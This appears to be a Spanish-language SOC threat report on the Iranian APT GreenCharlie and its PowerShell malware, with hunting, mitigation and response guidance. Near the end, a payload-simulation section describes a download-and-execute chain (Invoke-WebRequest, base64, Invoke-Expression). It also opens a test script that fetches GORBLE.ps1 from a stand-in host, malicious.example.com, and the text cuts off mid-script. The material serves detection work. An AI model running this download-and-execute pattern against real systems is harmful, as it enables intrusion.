GreenCharlie: El Informe SOC sobre Explotaciones de PowerShell por APT Respaldado por Irán
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen del Exploit de PowerShell de GreenCharlie
GreenCharlie es un grupo APT basado en Irán que lleva a cabo ciberespionaje utilizando una familia de malware PowerShell de múltiples etapas (GORBLE, TAMECAT, POWERSTAR). El grupo registra muchos dominios DNS dinámicos para phishing, utiliza scripts de PowerShell ofuscados con codificación Base64 y bit a bit personalizada, y se comunica con servidores C2 a través de HTTPS POST. La actividad aumentó en mayo-agosto de 2024 con IP iraníes y servicios VPN enmascarando el tráfico.
Investigación
Analice el tráfico de red en busca de conexiones a dominios DDNS conocidos y rangos de IP asociados con el grupo (por ejemplo, *.ddnsgeek.com, *.dns-dynamic.net). Busque cadenas de ejecución de PowerShell que realicen decodificación Base64 seguidas de operaciones NOT bit a bit, y scripts que invoquen ScriptBlock.Create o Invoke‑Expression. Monitoree la inyección de procesos y la ejecución en memoria de cargas útiles descifradas. Correlacione alertas con las técnicas ATT&CK T1583.001, T1566.002, T1059.001, T1568.
Mitigación
Implemente un registro estricto de PowerShell (ModuleLogging, ScriptBlockLogging) y haga cumplir el modo de lenguaje restringido. Bloquee o canalice el tráfico hacia proveedores DDNS conocidos y TLD sospechosos (.info, .xyz, .icu, .network, .online, .site). Despliegue DNS sandboxing y filtrado de URL para dominios de phishing. Utilice soluciones de detección y respuesta en el endpoint (EDR) para detectar scripts PowerShell ofuscados y desciframiento AES en memoria. Refuerce el principio de privilegio mínimo para cuentas de servicio y desactive herramientas de ejecución remota innecesarias.
Respuesta a la Amenaza de GreenCharlie
Cuando se detecta un indicador, aísle el host afectado, capture la memoria volátil y recoja registros de PowerShell. Realice un análisis forense para extraer la carga útil decodificada e identificar servidores C2. Revoque credenciales comprometidas, rote secretos y elimine tareas programadas relacionadas o mecanismos de persistencia. Realice intercambio de inteligencia sobre amenazas de IOCs (dominios, IPs, valores hash) con ISACs relevantes y actualice las reglas de detección en consecuencia.
Flujo de Ataque
Reglas de Detección de PowerShell de GreenCharlie
Detección de Marcos de Malware PowerShell del APT GreenCharlie [Windows Powershell]
Ver
Posible Infiltración / Exfiltración de Datos / C2 a través de Servicios / Herramientas de Terceros (vía proxy)
Ver
IOCs (ip) para detectar: Campañas de Ciberespionaje de GreenCharlie APT: Basadas en PowerShell de Irán
Ver
IOCs (emails) para detectar: Campañas de Ciberespionaje de GreenCharlie APT: Basadas en PowerShell de Irán
Ver
Instrucciones para Simulación de Carga Útil
-
Narrativa de Ataque y Comandos:
Fase 1 – Recuperar el cargador malicioso:
El atacante usaInvoke-WebRequestpara descargar un script de PowerShell llamado GORBLE.ps1 desde un servidor C2.Fase 2 – Codificar la carga útil:
El script descargado contiene la carga útil maliciosa. El atacante codifica todo el script en base64 y lo almacena en una variable$x.Fase 3 – Ejecutar a través de cmdlet de alto riesgo:
UsandoInvoke-Expression, el atacante decodifica$xsobre la marcha y lo ejecuta, invocando así el marco GORBLE.Fase 4 – Movimiento lateral (opcional):
La carga útil puede posteriormente llamarScriptBlock.Createcon una cadena ofuscada bit a bit para lanzar un comando de PowerShell de segunda etapa en un host remoto. -
Script de Prueba de Regresión:
# ------------------------------------------------- # Simulación del Marco de PowerShell de GreenCharlie APT # ------------------------------------------------- # 1. Simular descarga del marco malicioso (palabra clave GORBLE) $maliciousUrl = "http://malicious.example.com/GORBLE.ps1" $downloaded = @" # GORBLE - carga útil maliciosa simulada